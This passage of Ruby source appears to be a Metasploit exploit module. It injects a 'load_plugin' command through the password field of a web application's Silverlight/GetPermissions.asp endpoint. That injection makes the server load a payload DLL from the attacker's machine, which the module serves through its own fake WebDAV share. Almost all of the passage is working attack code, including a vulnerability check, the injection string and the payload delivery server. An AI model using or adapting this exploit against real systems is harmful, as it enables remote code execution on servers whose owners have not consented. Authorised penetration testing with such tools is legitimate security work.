OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/']),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
'(do not change)', 80 ]),
OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will ' +
'wait for the payload request', 20]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
], self.class)
end
def autofilter
false
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
vprint_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
if blacklisted_path?(request.uri)
vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
return
end
if request.uri.include?(@basename)
print_status("GET => Payload")
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_dll({ :code => p.encoded })
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Treat index.html specially
if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
vprint_status("GET => REDIRECT (#{request.uri})")
resp = create_response(200, "OK")
resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=|
resp.body += %Q|#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
# Anything else is probably a request for a data file...
vprint_status("GET => DATA (#{request.uri})")
data = rand_text_alpha(4 + rand(4))
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
vprint_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY,' +
+ ' MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, ' +
+ 'LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
vprint_status("PROPFIND #{path}")
if path !~ /\/$/
if blacklisted_path?(path)
vprint_status "PROPFIND => 404 (#{path})"
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
return
end
if path.index(".")
vprint_status "PROPFIND => 207 File (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
return
else
vprint_status "PROPFIND => 301 (#{path})"
resp = create_response(301, "Moved")
resp["Location"] = path + "/"
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
end
vprint_status "PROPFIND => 207 Directory (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
if request["Depth"].to_i > 0
trail = path.split("/")
trail.shift
case trail.length
when 0
body << generate_shares(path)
when 1
body << generate_files(path)
end
else
vprint_status "PROPFIND => 207 Top-Level Directory"
end
body << "</D:multistatus>"
body.gsub!(/\t/, '')
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
end
def generate_shares(path)
share_name = @share_name
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
end
def generate_files(path)
trail = path.split("/")
return "" if trail.length < 2
base = @basename
exts = @extensions.gsub(",", " ").split(/\s+/)
files = ""
exts.each do |ext|
files << %Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{base}.#{ext}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
<D:ishidden b:dt="boolean">1</D:ishidden>
</D:propstat>
</D:response>
|
end
files
end
def gen_timestamp(ttype=nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
# This method rejects requests that are known to break exploitation
def blacklisted_path?(uri)
share_path = "/#{@share_name}"
payload_path = "#{share_path}/#{@basename}.dll"
case uri
when payload_path
return false
when share_path
return false
else
return true
end
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
'vars_post' =>
{
'username' => rand_text_alpha(4 + rand(4)),
'password' => rand_text_alpha(4 + rand(4))
}
})
if res && res.code == 200 && res.body =~ /PermissionRecord/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def send_injection(dll)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
'vars_post' =>
{
'username' => rand_text_alpha(3 + rand(3)),
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
"(load_plugin \"#{dll}\" 1)(\""
}
}, 1)
res
end
def on_new_session(session)
if service
service.stop
end
super
end
def primer
print_status("#{peer} - Sending injection...")
res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
if res
print_error("#{peer} - Unexpected answer")
end
end
def exploit
if datastore['UNCPATH'].blank?
@basename = rand_text_alpha(3)
@share_name = rand_text_alpha(3)
@extensions = "dll"
@system_commands_file = rand_text_alpha_lower(4)
if (datastore['SRVHOST'] == '0.0.0.0')
@myhost = Rex::Socket.source_address('50.50.50.50')
else
@myhost = datastore['SRVHOST']
end
@exploit_unc = "\\\\#{@myhost}\\"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
'URIPATH=/')
end
print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}" +
"\\#{@basename}.dll")
begin
# The Windows Webclient needs some time...
Timeout.timeout(datastore['WEBDAV_DELAY']) { super }
rescue ::Timeout::Error
service.stop if service
end
else
# Using external SMB Server
if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/
host = $1
share_name = $2
dll_name = $3
print_status("#{peer} - Sending injection...")
res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}")
if res
print_error("#{peer} - Unexpected answer")
end
else
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
'\\\\host\\shared_folder\\base_name.dll')
end
end
end
end